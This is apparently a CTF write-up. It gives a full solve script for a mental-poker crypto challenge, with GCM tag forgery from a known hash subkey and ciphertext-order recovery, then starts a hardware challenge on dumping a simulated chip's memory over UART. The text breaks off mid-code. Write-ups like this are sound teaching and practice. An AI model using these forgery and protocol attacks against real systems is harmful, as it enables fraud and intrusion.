In spite of my otherwise packed schedule, I managed to set aside some time this past weekend to play UMass CTF with my team L3ak. As a team we placed first, and I personally cleared out the entire web category, several from OSINT and misc, and two of the three hardware challenges. I had a lot of fun with a bunch of the challenges and chose four of my favorites to write about.

Brainrot Gamba

This challenge was the hardest from the crypto category, and went unsolved until the end. It was the only challenge my team didn’t solve during the event. I finished my solution a few hours after it ended. My solution was different from what the author intended, so I felt it deserved a writeup anyway.

The gist is that it’s an implementation of mental poker, where the goal is for the opponent to have quad-aces and for us to have a royal flush. The main function of the server program looks like this:

hash_key = os.urandom(16)
print(f"I commit to this key: {AES.new(hash_key, AES.MODE_ECB).encrypt(int.to_bytes(0, length=16)).hex()}")
iv = bytes.fromhex(input("Please commit to an IV!"))
deck = get_deck('Give me a deck of cards: ', 52)
safely_hashed_deck = {ghash(bytes.fromhex(s), hash_key, iv): c for c, s in zip(normal_deck, shuffle(deck))}
if len(safely_hashed_deck) != 52:
    raise ValueError("You didn't give me unique cards!")
print(f"Here's the deck we're using: {json.dumps([hex(k) for k in safely_hashed_deck])}")
print(f"You can check that the key I used matches my commitment: {hash_key.hex()}")

print("Now, let's shuffle the deck!")
global_d, deck = encrypt_deck(safely_hashed_deck)
print(json.dumps(shuffle(deck)))
deck = get_deck('Shuffle and encrypt, then give me back the deck: ', 52)
deck = decrypt_deck(deck, global_d)
my_keys, deck, key_hashes = encrypt_cards(deck, hash_key, iv)
print(
    "I removed my global encryption, and added individual encryption. Here's my deck now, along with the hashes of the encryption: ")
print(json.dumps(deck))
print(json.dumps(key_hashes))
deck = get_deck('Remove your global encryption, add your own individual encryption, then give me back the deck: ',
                52)
opponents_hashes = get_deck("Also, give me the hash to all your keys to make sure you're not cheating: ", 52)

print("Now, let's play poker!")
print("Here are the keys to your cards: ", json.dumps([hex(my_keys[i]) for i in [0, 1]]))
opp_keys = get_deck("Give me my first two keys: ", 2)
hand = {decrypt_cards(deck[i], my_keys[i], opp_keys[i - 2], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
        for i in [2, 3]}
if len(hand) < 2:
    raise ValueError("You didn't give me unique cards!")
if not all(card[0] == 'A' for card in hand):
    raise ValueError("I'm not playing until I get aces!")

print("Here are the keys to the streets: ", json.dumps([hex(my_keys[i]) for i in [4, 5, 6, 7, 8]]))
opp_keys = get_deck("Give me my street keys: ", 5)
street = {decrypt_cards(deck[i], my_keys[i], opp_keys[i - 4], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
            for i in [4, 5, 6, 7, 8]}
if len(street.union(hand)) < 7:
    raise ValueError("You didn't give me unique cards!")
if not {'Ac', 'Ah', 'Ad', 'As'} <= street.union(hand):
    raise ValueError("I'm not betting until I get quad aces!")

print("Here are the keys to my cards: ", json.dumps([hex(my_keys[i]) for i in [2, 3]]))
print("Read em' and weep!")

opp_keys = get_deck("Give me your first two keys: ", 2)
opp_hand = {decrypt_cards(deck[i], my_keys[i], opp_keys[i], hash_key, opponents_hashes[i], safely_hashed_deck, iv)
            for i in [0, 1]}
if len(street.union(opp_hand).union(hand)) < 9:
    raise ValueError("You didn't give me unique cards!")
if not any({rank + suit for rank in 'TJQKA'} <= street.union(opp_hand) for suit in 'chds'):
    raise ValueError("I don't know what you think you had but it's clearly not beating aces!")

print("dang, i should stop gambling.")
with open('flag.txt', 'r') as f:
    print(f.readline())

Breaking down the source code, it does the following things:

  1. Generates a secure random 16-byte AES key, and gives us the encryption of 16 null bytes using it
  2. Asks us for an IV
  3. Asks us for a list of 52 numbers to use as the base deck and runs the ghash function on them
  4. Randomly matches one of the hashed values to a card value, and then gives us the ghashed keys in order (so we know which ghash goes with which card)
  5. Gives us the randomly generated AES key so that we can validate the ghashes match what we expect
  6. Encrypts the deck using the same key for every card, shuffles it, gives it to us, and asks us to do the same
  7. Decrypts the server’s encryption of the double-encrypted deck, and then adds new encryption on a per-card basis
  8. Gives us the current deck and the hashes of the individual keys, asks us to undo our encryption, re-encrypt per-card, and provide the hashes to prove what our keys are
  9. In multiple steps, assigns us the first two cards, itself the next two, and the next five as community cards
  10. Asks for our keys, verifies their hashes, and decrypts the cards
  11. Raises an error if the server doesn’t have two aces in its personal hand
  12. Raises an error if the other two aces aren’t in the community cards
  13. Raises an error if we don’t have a royal flush
  14. Prints the flag

The helper functions look like this:

normal_deck = [''.join(card) for card in itertools.product("23456789TJQKA", "chds")]

# https://www.rfc-editor.org/rfc/rfc3526#section-3
p = int(""" FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1
      29024E08 8A67CC74 020BBEA6 3B139B22 514A0879 8E3404DD
      EF9519B3 CD3A431B 302B0A6D F25F1437 4FE1356D 6D51C245
      E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
      EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE45B3D
      C2007CB8 A163BF05 98DA4836 1C55D39A 69163FA8 FD24CF5F
      83655D23 DCA3AD96 1C62F356 208552BB 9ED52907 7096966D
      670C354E 4ABC9804 F1746C08 CA237327 FFFFFFFF FFFFFFFF""".replace(' ', '').replace('\n', ''), 16)


def shuffle(l):
    return [x for x in sorted(l, key=lambda x: int.from_bytes(os.urandom(2)))]


def ghash(data, key, iv):
    cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
    cipher.update(data)
    _, tag = cipher.encrypt_and_digest(b'')
    result = int.from_bytes(tag)
    if result < 1 << 127:
        result += 1 << 128
    return result ** 2


def encrypt(msg, e):
    return pow(msg, e, p)


def decrypt(msg, d):
    return pow(msg, d, p)


def random_key_pair():
    e = getRandomNBitInteger(p.bit_length() // 2) * 2 + 1
    d = pow(e, -1, p - 1)
    return e, d


def encrypt_deck(deck):
    e, d = random_key_pair()
    return d, [hex(encrypt(card, e)) for card in deck]


def decrypt_deck(deck, d):
    return [decrypt(int(card, 16), d) for card in deck]


def encrypt_cards(deck, hash_key, iv):
    keys = [random_key_pair() for _ in range(52)]
    return [key[1] for key in keys], [hex(encrypt(card, key[0])) for card, key in zip(deck, keys)], [
        hex(ghash(hex(key[1]).encode(), hash_key, iv)) for key in keys]


def decrypt_cards(card, my_key, opp_key, hash_key, hash_value, safely_hashed_deck, iv):
    opp_key = int(opp_key, 16)
    if hex(ghash(hex(opp_key).encode(), hash_key, iv)) != hash_value:
        raise ValueError("Your key has does not match your commitment!")
    decrypted = decrypt(decrypt(int(card, 16), opp_key), my_key)
    if decrypted not in safely_hashed_deck:
        raise ValueError("Your key does not decrypt correctly!")
    return safely_hashed_deck[decrypted]


def get_deck(msg, size):
    resp = input(msg)
    if len(resp) > 100000:
        raise ValueError("yeah i'm not parsing that.")
    deck = json.loads(resp)
    if not isinstance(deck, list):
        raise ValueError('You did not give me a list!')
    if len(deck) != size:
        raise ValueError("You did not give me the correct number of items!")
    if not all(isinstance(card, str) for card in deck):
        raise ValueError("You didn't give me valid items!")
    return deck

The things to note here are that the prime being used is a known RFC 3526 prime, the encryption is an exponentiation cipher similar to RSA (but with a prime modulus instead of a composite one), and the ghash is the GCM tag of the data (with the known key and IV), but shifted by 1<<128 if it’s less than 1<<127, and then squared.
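
To make the commutative part of this concrete, here is a minimal sketch of the same exponentiation cipher with two parties. It assumes a small Mersenne prime (2**127 - 1) in place of the RFC 3526 prime, and the server_* and player_* names are mine, not the challenge's. The key generation also differs slightly from the challenge (it retries until the exponent is invertible), so treat it as an illustration rather than the server's code.

```python
import math
import secrets

# Assumption: a small Mersenne prime stands in for the 2048-bit RFC 3526 prime.
P = 2**127 - 1


def random_key_pair(p=P):
    """Return (e, d) with e*d = 1 (mod p-1), so pow(pow(x, e, p), d, p) == x."""
    while True:
        e = secrets.randbelow(p - 3) + 2
        if math.gcd(e, p - 1) == 1:
            return e, pow(e, -1, p - 1)


def encrypt(msg, e, p=P):
    return pow(msg, e, p)


def decrypt(msg, d, p=P):
    return pow(msg, d, p)


# Hypothetical keys for the two sides of the game.
server_e, server_d = random_key_pair()
player_e, player_d = random_key_pair()

card = 0x1234567890ABCDEF
double = encrypt(encrypt(card, server_e), player_e)

# The two layers can be peeled off in either order.
assert decrypt(decrypt(double, server_d), player_d) == card
assert decrypt(decrypt(double, player_d), server_d) == card
```

This order-independence is what lets each side strip its own global encryption from a deck the other side has already re-encrypted.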

There are a couple potential avenues of attack that I considered here, those being:

  1. Find a key that decrypts a ciphertext to a specific plaintext, and then also has a ghash collision
  2. Identify the encrypted cards after they’re shuffled, and return them in a calculated order

The former is hard, and would require solving the discrete log problem. The second option, however, is more interesting. There would be a couple potential ways to approach this, including trying to crack the encryption outright and abusing some property to identify encrypted values relative to each other. Trying to recover the e or d value again runs us into discrete log, but there are some properties that could let us identify certain numbers relative to each other.

For our toy example, let’s use p = 4096760407, e = 70409, and d = 1566228701. Our encryption and decryption functions are the same as from the challenge, and look like this:

def encrypt(msg, e):
    return pow(msg, e, p)

def decrypt(msg, d):
    return pow(msg, d, p)

If we encrypt random plaintexts, there’s no obvious way for us to decrypt them without knowing the value of e (which again, in this challenge is far too big to brute force). For example, if we have the plaintext numbers 1722030 and 3444060, their encryptions are 2520216226 and 3903378220, with no clear way of identifying which is which without e. However, it’s notable that 3444060 is a multiple of 1722030. Dividing the two gives the quotient 2. What happens when we divide the encrypted values? Division in a finite field is the same thing as multiplication by the inverse (mod p), which we can do like this:

m1 = 2520216226
m2 = 3903378220
q = m2*pow(m1, -1, p) % p
print(q)

The output here is 900051483, which at first looks unhelpful, but notably is equal to the value of encrypt(2, e). The property we can abuse here is that if a / b == c is true, then encrypt(a) / encrypt(b) == encrypt(c) (mod p), because exponentiation distributes over multiplication and division. However, without knowing e, we still can’t find the value of encrypt(2, e) on its own to match against. Luckily we’re given 52 numbers to encrypt, not just two. Instead of picking one pair with the same quotient, if we pick two (say, (1722030, 3444060) and (9420822, 18841644)), we can see that dividing their encrypted values gives matching quotients:

m3 = encrypt(9420822, e)
m4 = encrypt(18841644, e)
q2 = m4*pow(m3, -1, p) % p
print(q2)

This gives the same output as the first pair, 900051483. On its own, this isn’t directly helpful. All this would allow us to do is identify two pairs of numbers in the encrypted deck (so, 4 total), and we’d know that those 4 cards were 4 specific cards (in some order), but we’d have no way of knowing which pair was which, or which card was which within the pair. Also, if we tried adding more values with different quotients, we would run into the additional problem that there’s no way to indicate which group is which, because while we can match pairs by their quotients, there’s still no way to confirm which quotient is which.

One potential way around this is to make chains of numbers, instead of simply pairs. The idea here would be to select a common ratio x such that m_n = m_0 * x**n. If we could do this, we could identify the specific order of the numbers by dividing all of them by every other, and keeping track of the number of times each value shows up. There would be two modes of this collection, encrypt(x) and encrypt(1/x). There would be no way of knowing which direction the chain goes, but if all of the cards are in a single chain, a 50% chance of guessing right is more than good enough.
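
Here is a toy version of that idea, as a sketch under my own assumptions: the prime 2**61 - 1 and the fixed exponent 65537 are stand-ins, and recover_chain is a hypothetical helper that is simpler than the find_order function used for the actual solve. It encrypts a chain with ratio 2, shuffles it, and recovers the order from the most common quotient.

```python
import random

P = 2**61 - 1   # assumption: small Mersenne prime instead of the challenge's prime
E = 65537       # assumption: a fixed exponent, unknown to the "attacker" code below


def encrypt(msg, e=E, p=P):
    return pow(msg, e, p)


def recover_chain(encs, p=P):
    """Order encrypted chain members; the direction of the chain stays ambiguous."""
    counts = {}
    for a in encs:
        for b in encs:
            if a != b:
                q = a * pow(b, -1, p) % p
                counts[q] = counts.get(q, 0) + 1
    # The most common quotient is encrypt(x) or encrypt(1/x).
    step = max(counts, key=counts.get)

    # succ[a] is the element exactly one step after a.
    succ = {}
    for a in encs:
        for b in encs:
            if a != b and b * pow(a, -1, p) % p == step:
                succ[a] = b

    has_predecessor = set(succ.values())
    start = next(a for a in encs if a not in has_predecessor)
    order = [start]
    while order[-1] in succ:
        order.append(succ[order[-1]])
    return order


plain = [3 * 2**n for n in range(10)]      # m_n = m_0 * x**n with m_0 = 3, x = 2
encs = [encrypt(m) for m in plain]
shuffled = encs[:]
random.shuffle(shuffled)

order = recover_chain(shuffled)
assert order == encs or order == encs[::-1]
```

The final assertion accepts both directions on purpose, since nothing in the ciphertexts distinguishes encrypt(x) from encrypt(1/x).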

The obvious way to attempt to exploit this would be to start with m_0 = 1 and x = 2, where our plaintext values are the powers of two. This would solve the problem, and there are more than enough powers of two within the bounds of the GCM tag for this to work. The issue arises in that the GCM tag is shifted by 1<<128 if it’s less than 1<<127. Adding a constant like that breaks the divisibility property we’re relying on, and cutting our potential space to be between two powers of two would ruin our plan.
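
A small sketch of the tail end of ghash() shows which part of the post-processing is harmless and which part is the problem. The postprocess function below is my own extraction of the last three lines of the challenge's ghash(), fed with plain integers instead of real GCM tags. Squaring keeps a common ratio intact (it just becomes the ratio squared), while the conditional shift does not.

```python
from fractions import Fraction


def postprocess(tag_int):
    """Mirror of the end of the challenge's ghash(): conditional shift, then square."""
    result = tag_int
    if result < 1 << 127:
        result += 1 << 128
    return result ** 2


# Both values are at least 1<<127, so no shift happens: ratio 3/2 becomes 9/4.
a, b = 1 << 127, 3 << 126
assert Fraction(b, a) == Fraction(3, 2)
assert Fraction(postprocess(b), postprocess(a)) == Fraction(9, 4)

# Both values are below 1<<127, so both get shifted: ratio 2 does not become 4.
c, d = 1 << 10, 1 << 11
assert Fraction(postprocess(d), postprocess(c)) != 4
```

Note that with ratio 2 it is impossible for two chain members to both land in the unshifted range, since doubling anything at or above 1<<127 already exceeds the 128-bit tag size.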

It’s important to note that having the encryption of 16 null bytes under hash_key (which the server gives us as its commitment), along with control of the IV, is sufficient to manufacture inputs that produce arbitrary GCM tags. Code to do that looks like this:

from sage.all import *

x = GF(2)["x"].gen()
gf2e = GF(2 ** 128, name="y", modulus=x ** 128 + x ** 7 + x ** 2 + x + 1)

def _to_gf2e(n):
    return gf2e([(n >> i) & 1 for i in range(127, -1, -1)])

def _from_gf2e(p):
    n = p.integer_representation()
    ans = 0
    for i in range(128):
        ans <<= 1
        ans |= ((n >> i) & 1)
    return ans

def inverse_ghash(key, vals):
    p = _to_gf2e(0)
    key = int.from_bytes(key, 'big')
    k = _to_gf2e(key)
    inv_k = 1/k

    p *= inv_k
    p -= _to_gf2e(8 * 16)

    p *= inv_k
    iv = _from_gf2e(p)
    iv = iv.to_bytes(16, 'big')

    result = []
    for i in vals:
        i ^= key
        p = _to_gf2e(i)
        p *= inv_k
        p -= _to_gf2e(((8 * 16) << 64))
        p *= inv_k
        result.append(_from_gf2e(p).to_bytes(16, 'big'))
    return iv, result
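
For reference, this is my reading of why inverse_ghash works, based on how GCM defines the tag rather than on anything stated in the challenge. The key argument is really H, the encryption of the zero block that the server commits to. Multiplication is in GF(2^128), the IV and the data A are each one 16-byte block, and the ciphertext is empty.

```latex
\begin{align*}
H   &= E_K(0^{128}) \\
J_0 &= (IV \cdot H \oplus L_{IV}) \cdot H, & L_{IV} &= [0]_{64} \,\|\, [128]_{64} \\
IV  &= L_{IV} \cdot H^{-1} \;\Rightarrow\; J_0 = 0, \quad E_K(J_0) = H \\
T   &= (A \cdot H \oplus L_A) \cdot H \oplus E_K(J_0), & L_A &= [128]_{64} \,\|\, [0]_{64} \\
A   &= \big( (T \oplus H) \cdot H^{-1} \oplus L_A \big) \cdot H^{-1}
\end{align*}
```

The IV line corresponds to the first few statements of the function, and the last line is what the loop computes for each target tag (the i ^= key step is the XOR with H).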

I spent a while trying to find a way around the shift issue, and eventually the solution clicked: our common ratio x doesn’t have to be an integer. There’s nothing stopping us from using a fractional ratio, as long as every value in the chain is an integer. The math works the same. Between 1<<127 (the lower bound to avoid the shift) and 1<<128 (the max value of the GCM tag), the longest integer chain with a common ratio is allegedly around 25 long. Some brief research I did after solving this (into math I don’t fully understand) suggests that the optimal ratio is around 36/35, but while experimenting to find something that worked well enough I landed on 1.02, and the longest chain I could find was 23. I found the chain of numbers using z3, like this:

from z3 import *
vars = [Int(f'x_{i}') for i in range(23)]
c = 1.02
s = Solver()
for i,x in enumerate(vars):
    s.add(
        x >= (1<<127),
        x < (1<<128)
    )
    if i > 0:
        s.add(
            x == c*vars[i-1]
        )
if s.check() == sat:
    m = s.model()
    for i in range(23):
        print(f'{m[vars[i]]},')
else:
    print("no solution")
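
The same kind of chain can also be built directly, without a solver. This is a sketch of my own, not what I ran during the event: with the ratio written as a fraction in lowest terms (1.02 = 51/50), a chain of n integers needs its first element to be a multiple of 50**(n-1), so we can take the smallest such multiple at or above 1<<127 and check that the last element still fits below 1<<128. The build_chain name and its parameters are hypothetical.

```python
LO, HI = 1 << 127, 1 << 128


def build_chain(num, den, length):
    """Return `length` integers in [LO, HI) with common ratio num/den, or None.

    Assumes num/den is in lowest terms and num > den.
    """
    base = den ** (length - 1)
    k = -(-LO // base)  # smallest k such that k * base >= LO
    chain = [k * den ** (length - 1 - i) * num ** i for i in range(length)]
    return chain if chain[-1] < HI else None


chain = build_chain(51, 50, 23)
assert chain is not None and len(chain) == 23
assert chain[0] == 190734863281250000000000000000000000000
assert all(50 * b == 51 * a for a, b in zip(chain, chain[1:]))

# One element longer no longer fits for this ratio.
assert build_chain(51, 50, 24) is None
```

The starting value it finds is 8 * 50**22, which is the first number in the list of 52 values further down.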

23 is a fair bit less than 52, so this alone wasn’t sufficient. To get around this, I generated three chains of different lengths: one that was 23 long, one that was 21 long, and one that was 8 long. Using the length of the chain to figure out its order is somewhat hacky, but works well enough.

Even though 1.02 isn’t an integer, the strategy to find common ratios works exactly the same. These were the 52 values I ended up using:

vars = [
    190734863281250000000000000000000000000,
    194549560546875000000000000000000000000,
    198440551757812500000000000000000000000,
    202409362792968750000000000000000000000,
    206457550048828125000000000000000000000,
    210586701049804687500000000000000000000,
    214798435070800781250000000000000000000,
    219094403772216796875000000000000000000,
    223476291847661132812500000000000000000,
    227945817684614355468750000000000000000,
    232504734038306642578125000000000000000,
    237154828719072775429687500000000000000,
    241897925293454230938281250000000000000,
    246735883799323315557046875000000000000,
    251670601475309781868187812500000000000,
    256704013504815977505551568750000000000,
    261838093774912297055662600125000000000,
    267074855650410542996775852127500000000,
    272416352763418753856711369170050000000,
    277864679818687128933845596553451000000,
    283421973415060871512522508484520020000,
    289090412883362088942772958654210420400,
    294872221141029330721628417827294628808,

    170145034790039062500000000000000000000,
    173547935485839843750000000000000000000,
    177018894195556640625000000000000000000,
    180559272079467773437500000000000000000,
    184170457521057128906250000000000000000,
    187853866671478271484375000000000000000,
    191610944004907836914062500000000000000,
    195443162885005993652343750000000000000,
    199352026142706113525390625000000000000,
    203339066665560235795898437500000000000,
    207405847998871440511816406250000000000,
    211553964958848869322052734375000000000,
    215785044258025846708493789062500000000,
    220100745143186363642663664843750000000,
    224502760046050090915516938140625000000,
    228992815246971092733827276903437500000,
    233572671551910514588503822441506250000,
    238244124982948724880273898890336375000,
    243009007482607699377879376868143102500,
    247869187632259853365436964405505964550,
    252826571384905050432745703693616083841,

    170145034790039062499999960937500000000,
    173547935485839843749999960156250000000,
    177018894195556640624999959359375000000,
    180559272079467773437499958546562500000,
    184170457521057128906249957717493750000,
    187853866671478271484374956871843625000,
    191610944004907836914062456009280497500,
    195443162885005993652343705129466107450
]

My function to find and build these chains looked like this:

def find_order(encs):
    quotients = {}
    for i in encs:
        for j in encs:
            if i == j:
                continue
            q = i*pow(j, -1, p) % p
            if q in quotients:
                quotients[q] += 1
            else:
                quotients[q] = 1

    keys = [i for i in quotients]
    keys.sort(key=lambda x : quotients[x], reverse=True)
    q1 = keys[0]
    q2 = keys[1]

    maps = {}
    for c in encs:
        a = None
        b = None
        for o in encs:
            if c == o:
                continue
            if c*pow(o, -1, p) % p == q1:
                a = o
            elif c*pow(o, -1, p) % p == q2:
                b = o
        if a is not None or b is not None:
            maps[c] = {'a': a, 'b': b}

    starts = []
    for m in maps:
        if maps[m]['a'] is None:
            starts.append(m)

    orders = []
    for start in starts:
        order = [start]
        next = maps[start]['b']
        while next is not None:
            order.append(next)
            next = maps[next]['b']
        orders.append(order)

    orders.sort(key=lambda x: len(x), reverse=True)
    order = []
    for o in orders:
        order.extend(o)
    return order

It’s fairly hacky and could probably be cleaner, but it works well enough. My code to interact with the server and solve the challenge was as follows:

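from pwn import *  # pwntools: remote, process
import json

# Assumes normal_deck, ghash, inverse_ghash, vars, and find_order from above are in scope.
# io = process(["python3", "chall.py"])
io = remote("ctf.umasscybersec.org", 7002)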
io.recvuntil(b'I commit to this key: ')
hash_key_enc = bytes.fromhex(io.recvuntil(b'\n').decode().strip())
io.recv()
iv, cards = inverse_ghash(hash_key_enc, vars)
hex_cards = [i.hex() for i in cards]
io.sendline(iv.hex().encode())
io.sendline(json.dumps(hex_cards).encode())
io.recvuntil(b"Give me a deck of cards: Here's the deck we're using: ")
safely_hashed_deck_keys = [int(i,16) for i in json.loads(io.recvuntil(b'\n').decode().strip())]
safely_hashed_deck = {k: v for k, v in zip(safely_hashed_deck_keys, normal_deck)}
safely_hashed_deck_reverse = {v : k for k, v in zip(safely_hashed_deck_keys, normal_deck)}
io.recvuntil(b"You can check that the key I used matches my commitment: ")
hash_key = bytes.fromhex(io.recvuntil(b'\n').decode().strip())
orig_ghashes = [x**2 for x in vars]
io.recvuntil(b"Now, let's shuffle the deck!\n")
shuffled_deck = json.loads(io.recvuntil(b'\n').decode().strip())
shuffled_deck = [int(i,16) for i in shuffled_deck]
ordered = find_order(shuffled_deck)
ordered_known = ordered[:]
ordered.extend([i for i in shuffled_deck if i not in ordered])
encrypted_deck_mappings_reverse = {a:safely_hashed_deck[b] for a,b in zip(ordered_known, orig_ghashes)}
encrypted_deck_mappings = {safely_hashed_deck[b]:a for a,b in zip(ordered_known, orig_ghashes)}
cards_ordered = [
    encrypted_deck_mappings["Td"],
    encrypted_deck_mappings["Jd"],
    encrypted_deck_mappings["Ac"],
    encrypted_deck_mappings["Ah"],
    encrypted_deck_mappings["As"],
    encrypted_deck_mappings["Ad"],
    encrypted_deck_mappings["Qd"],
    encrypted_deck_mappings["Kd"],
]
cards_ordered.extend([encrypted_deck_mappings[i] for i in encrypted_deck_mappings if encrypted_deck_mappings[i] not in cards_ordered])
guessed_deck_order = [encrypted_deck_mappings_reverse[i] for i in cards_ordered]
hexed_ordered_deck = json.dumps([hex(i) for i in cards_ordered])
io.sendline(hexed_ordered_deck.encode())
io.recvuntil(b"Here's my deck now, along with the hashes of the encryption: \n")
new_enc = io.recvuntil(b'\n').strip()
io.recv()
io.sendline(new_enc)
io.recv()
my_hashes = [hex(ghash(hex(i).encode(), hash_key, iv)) for i in [1]*52]
io.sendline(json.dumps(my_hashes).encode())
io.recvuntil(b'Here are the keys to your cards: ')
opp_keys = [hex(i) for i in [1]*52]
keys_0_1 = [i for i in json.loads(io.recvuntil(b'\n').strip().decode())]
encrypted_deck = [i for i in json.loads(new_enc.decode())]
io.recv()
io.sendline(json.dumps(opp_keys[:2]).encode())
io.recvuntil(b'Give me my street keys: ')
io.sendline(json.dumps(opp_keys[:5]).encode())
io.recvuntil(b'Give me your first two keys: ')
io.sendline(json.dumps(opp_keys[:2]).encode())
io.interactive()

As expected, the script succeeds about one run in two (whenever it guesses the chain direction correctly), and prints out the flag.

The flag is UMASS{call-1-800-GAMBLER-if-you're-in-the-US-and-need-help}.

This challenge was fun and strengthened my understanding of the properties of finite fields. I’m somewhat disappointed that I narrowly missed solving it in time, but given that no one else solved it and my team placed first regardless, I can’t really complain too much.

FCSIGN

FCSIGN was one of three challenges in the hardware category, and one of two that I solved. This challenge had 3 total solves by the end of the event, so I was pretty proud of my solution, as hardware isn’t a category I’ve attempted before. The challenge description reads:

What’s up homie, it’s Brody. I got one of those decomissioned signs from a motivational facility for something called UMassCTF. You think there’s anything cool in here? Got it hooked up in my lab if you want to mess around with it…

Run python client.py with your code.

and there are three attachments, client.py, datasheet.md, and datasheet.pdf. There’s also a hint that says

This chip is a bit quiet. I wonder if I could get it to talk…

Inspecting the files, datasheet.md seems to be the exact same as datasheet.pdf but in text form instead of PDF form. I somewhat suspect that this was done to let people easily give the datasheet to an LLM, but I’m not sure. For our purposes, the markdown is easier to read. client.py looks like this

import asyncio
import websockets
import json
import base64
import struct

async def connect(url):
    return await websockets.connect(url)

async def send_data(socket, data):
    await socket.send(json.dumps({
        'data' : base64.b64encode(data).decode('ascii')
    }))

async def receive_data(socket):
    response = await socket.recv()
    message = json.loads(response)
    return base64.b64decode(message['data']), message['cycles']

async def main():
    # Example test code...
    socket = await connect('ws://hardware.ctf.umasscybersec.org:10004')

    # Here is an example on how to interact with the target.
    await send_data(socket, b'\x12\x34\x56\x78')

    # This is for receiving the data and the cycle count...
    data, cycles = await receive_data(socket)

    return 0

if __name__ == "__main__":
    asyncio.run(main())

and the datasheet begins with

The UK47XD is an 32bit microcontroller designed for secure embedded applications. It features a simple memory layout, UART-based communication, and built-in security features to prevent tampering and unauthorized code execution. It is primarily used in the lighting industry.

Looking up the name of the chip doesn’t reveal anything, so it’s reasonable to assume that it was designed for this challenge. It’s not entirely clear, and I don’t think it really matters, but I find it unlikely that there’s a physical chip on the other end of this (as the other hardware challenge probably had). The unused import struct in client.py suggests that there’s just a Python program on the other end simulating our hypothetical chip. Reading the datasheet in more detail reveals the following:

Programming Mode

The UK47XD can be programmed over UART. In order to signal to the processor that you would like to interact with it over UART, simply send the bytes [0x55, 0x0, 0xC1, 0x0] within 5 seconds of booting the processor. The processor should then respond with an acknowledgement packet.

Programming Mode Commands

Packet Format

The transport packet format for all transactions is as follows:

struct Packet {
   uint8_t HEAD; // 0x33
   uint16_t LEN; // Length of data that comes after this field, in little endian.
   PACKET_INTERNAL_DATA DATA; // Data that is stored here
}

struct PACKET_INTERNAL_DATA {
   COMMANDS CMD; // Command Index
   RESPONSES STATUS; // Status, used by the system whenever something goes wrong.
   uint8_t ARGS[LEN - 2]; // The bytes for the arguments. It will be LEN - 1.
}

Command Indices

typedef enum {
   UNKNOWN = 0x0,
   COMM_INIT = 0x3,
   SET_CHIP_FREQ = 0x5,
   ID_AUTHENTICATION = 0x34,
   READ = 0x69,
} COMMANDS;

Response/Status Indices

typedef enum {
   ACK = 0x50,
   INVALID_COMMAND = 0x80,
   FLOW_ERROR = 0x81,
   UNAUTHORIZED = 0x82,
   INVALID_FREQUENCY = 0x83,
   INVALID_ID_LEN = 0x84,
   INVALID_ADDRESS = 0x87,
   INVALID_ADDRESS_ALIGNMENT = 0x88,
} RESPONSES;

The datasheet also gives us instructions on how to interact with the chip

Commands.COMM_INIT

Initializes communication with the processor over UART. This must be sent before any other command is sent, otherwise you will receive a packet with a FLOW_ERROR. Upon success, you will receive an acknowledgement back from the system.

Example packet structure: [0x33, 0x2, 0x0, 0x3, 0x0]

Commands.SET_CHIP_FREQ

Sets the processor speed in megahertz. This must be sent after the COMM_INIT command. Upon success, you will receive an acknowledgement back from the system. You must use either 8 or 16 MHz, as these are the only two operating frequencies.

Example packet structure (to set to 8 MHz): [0x33, 0x5, 0x0, 0x5, 0x00, 0x12, 0x7A, 0x00]

Commands.ID_AUTHENTICATION

Unlocks the chip for reading. This must be sent after the COMM_INIT command, and the SET_CHIP_FREQ, in that order. Upon success, you will receive an acknowledgement back from the system. This cannot be bruteforced; if an attempt is made, the chip is wiped for security reasons (see below).

Example packet structure (assuming the password is DEADBEEFDEADBEEF): [0x33, 0x11, 0x0, 0x34, 0x44, 0x43, 0x41, 0x44, 0x42, 0x45, 0x45, 0x46, 0x44, 0x43, 0x41, 0x44, 0x42, 0x45, 0x45, 0x46]

Commands.READ

Reads 0x400 bytes from a region. This must be sent after the unlocking the chip (see ID_AUTHENTICATION). Upon success, you will receive an acknowledgement back from the system, containing the 0x400 bytes.

Example packet structure (reading from 0x112233): [0x33, 0x5, 0x0, 0x69, 0x33, 0x22, 0x11, 0x00]
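
As a sanity check on the packet format, here is a short sketch that rebuilds two of the datasheet's example packets. The build_packet helper is my own name, and it assumes request packets carry only CMD followed by ARGS, which is what the SET_CHIP_FREQ, ID_AUTHENTICATION, and READ examples show (the COMM_INIT example has an extra trailing zero byte that this sketch does not reproduce).

```python
import struct

HEAD = 0x33


def build_packet(cmd: int, args: bytes = b"") -> bytes:
    """HEAD, then little-endian 16-bit LEN, then CMD and ARGS."""
    body = bytes([cmd]) + args
    return bytes([HEAD]) + struct.pack("<H", len(body)) + body


# SET_CHIP_FREQ to 8 MHz: the frequency is a little-endian 32-bit value in Hz.
set_freq_8mhz = build_packet(0x05, struct.pack("<I", 8_000_000))
assert set_freq_8mhz == bytes([0x33, 0x5, 0x0, 0x5, 0x00, 0x12, 0x7A, 0x00])

# READ from 0x112233: the address is a little-endian 32-bit value.
read_112233 = build_packet(0x69, struct.pack("<I", 0x112233))
assert read_112233 == bytes([0x33, 0x5, 0x0, 0x69, 0x33, 0x22, 0x11, 0x00])
```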

It elaborates on what it means by “this cannot be bruteforced” in a note at the end

  • An ID can be used to secure your processor. This is a 16 byte ID consisting of CAPITAL alphabetical characters ‘A’ through ‘Z’. If a user attempts to bruteforce this password, the chip will be erased, preserving the contents.

It’s still somewhat unclear to me what “if a user attempts to bruteforce this password, the chip will be erased” means, but from the behavior of the server I gather that it means the password is randomized for every connection. The datasheet also gives us an idea of the memory ranges we’re supposed to dump:

Memory Map

The memory map layout which programmers can access is organized as follows:

Address Range Description
0x0000–0x036F Boot Section
0x0370–0x0EDBFF Application Flash (User Area)

Note: Any access to any other addresses will result in a hard fault, requiring a reboot of the processor.
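
Since READ returns 0x400 bytes at a time, the memory map translates into a fixed list of read addresses. This is a small sketch that assumes reads must start on 0x400-byte boundaries (my guess, based on the INVALID_ADDRESS_ALIGNMENT status) and that the boot section can be read the same way as application flash.

```python
FLASH_END = 0x0EDBFF   # last valid address from the memory map
PAGE = 0x400           # bytes returned by one READ

# Every page-aligned address from 0 up to the end of application flash.
page_addrs = list(range(0, FLASH_END + 1, PAGE))

assert len(page_addrs) == 951
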